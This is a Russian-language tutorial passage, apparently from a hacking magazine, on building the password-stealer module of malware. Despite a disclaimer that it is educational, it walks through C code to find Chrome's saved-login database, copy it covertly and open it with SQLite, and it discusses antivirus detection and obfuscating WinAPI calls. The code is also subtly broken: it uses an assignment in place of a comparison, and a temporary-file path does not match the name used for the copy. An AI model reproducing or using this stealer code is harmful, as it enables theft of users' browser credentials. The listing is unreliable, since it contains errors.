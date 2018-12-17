WARNING
Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.
Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.
В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении».
Что скажет антивирус?
Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.
Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.
Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.
Chrome
Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:
C:\Users\%username%\AppData\Local\Google\Chrome\UserData\Default\Login Data
Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.
Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).
#define CHROME_DB_PATH "\\Google\\Chrome\\User Data\\Default\\Login Data"
bool get_browser_path(char * db_loc, int browser_family, const char * location) {
memset(db_loc, 0, MAX_PATH);
if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
return 0;
}
if (browser_family = 0) {
lstrcat(db_loc, TEXT(location));
return 1;
}
}
Вызов функции:
char browser_db[MAX_PATH];
get_browser_path(browser_db, 0, CHROME_DB_PATH);
Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле
browser_family, оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).
Если условие
browser_family = 0 выполняется, то получаем базу паролей браузера на основе Chrome, если
browser_family = 1 — Firefox. Идентификатор
CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции
SHGetFolderPath, передавая ей в качестве аргумента
CSIDL значение
CSIDL_LOCAL_APPDATA, которое означает:
#define CSIDL_LOCAL_APPDATA 0x001c // <user name>\Local Settings\Applicaiton Data (non roaming)
Функция
SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее
SHGetKnownFolderPath. Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:
HRESULT SHGetFolderPath(
HWND hwndOwner,
int nFolder,
HANDLE hToken,
DWORD dwFlags,
LPTSTR pszPath
);
После этого функция
lstrcat совмещает результат работы
SHGetFolderPath с идентификатором
CHROME_DB_PATH.
База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.
int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);
if (!status) {
// return 0;
}
Теперь подключаемся к базе командой
sqlite3_open_v2. Ее прототип:
int sqlite3_open_v2(
const char *filename, /* Database filename (UTF-8) */
sqlite3 **ppDb, /* OUT: SQLite db handle */
int flags, /* Flags */
const char *zVfs /* Name of VFS module to use */
);
Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение
SQLITE_OK, в противном случае возвращается код ошибки.
sqlite3 *sql_browser_db = NULL;
status = sqlite3_open_v2(TEMP_DB_PATH,
&sql_browser_db,
SQLITE_OPEN_READONLY,
NULL);
if(status != SQLITE_OK) {
sqlite3_close(sql_browser_db);
DeleteFile(TEXT(TEMP_DB_PATH));
}
INFO
Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.
Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией
sqlite3_exec().
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